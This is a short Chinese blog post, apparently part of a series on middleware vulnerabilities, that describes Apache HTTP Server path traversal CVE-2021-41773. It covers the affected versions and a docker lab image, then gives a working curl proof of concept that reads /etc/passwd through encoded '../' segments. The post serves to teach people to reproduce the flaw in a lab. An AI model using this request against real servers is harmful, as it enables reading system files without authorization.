常见中间件漏洞(四、Apache合集)

目录

四、Apache

[4.1 CVE-2021-41773](#4.1 CVE-2021-41773)

漏洞简介

影响版本

环境搭建

漏洞复现


四、Apache

4.1 CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
复制代码
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现

1.使用poc

复制代码
curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
技术小事5 小时前
AI挖出6个curl漏洞 但另外23份是噪音
人工智能·网络安全·漏洞挖掘·cve·curl·ai安全
吴声子夜歌10 小时前
ApacheCommons——commons-exec(外部进程与系统命令安全执行)
java·安全·apache
qetfw12 小时前
Debian 部署 phpMyAdmin:Apache、PHP 与 MariaDB 管理界面配置
linux·debian·php·apache
天涯柳絮13 小时前
SQL注入
数据库·sql·网络安全
黄金龙PLUS13 小时前
Xoodoo置换算法的优缺点
算法·网络安全·密码学·哈希算法·同态加密
吴声子夜歌13 小时前
ApacheCommons——commons-compress(解压缩工具)
java·apache
学逆向的15 小时前
PE——RVA与FOA的转换
开发语言·网络安全·pe
2601_9620975615 小时前
摩根大通:AI发现漏洞速度远超修补能力 网络风险持续累积
网络安全·ai·工业设施·漏洞修补·补丁缺口
吴声子夜歌16 小时前
ApacheCommons——commons-math3(科学计算与线性代数)(一)
java·线性代数·算法·apache
吴声子夜歌16 小时前
ApacheCommons——commons-configuration2(多数据源配置统一管理与热加载)
java·开发语言·算法·apache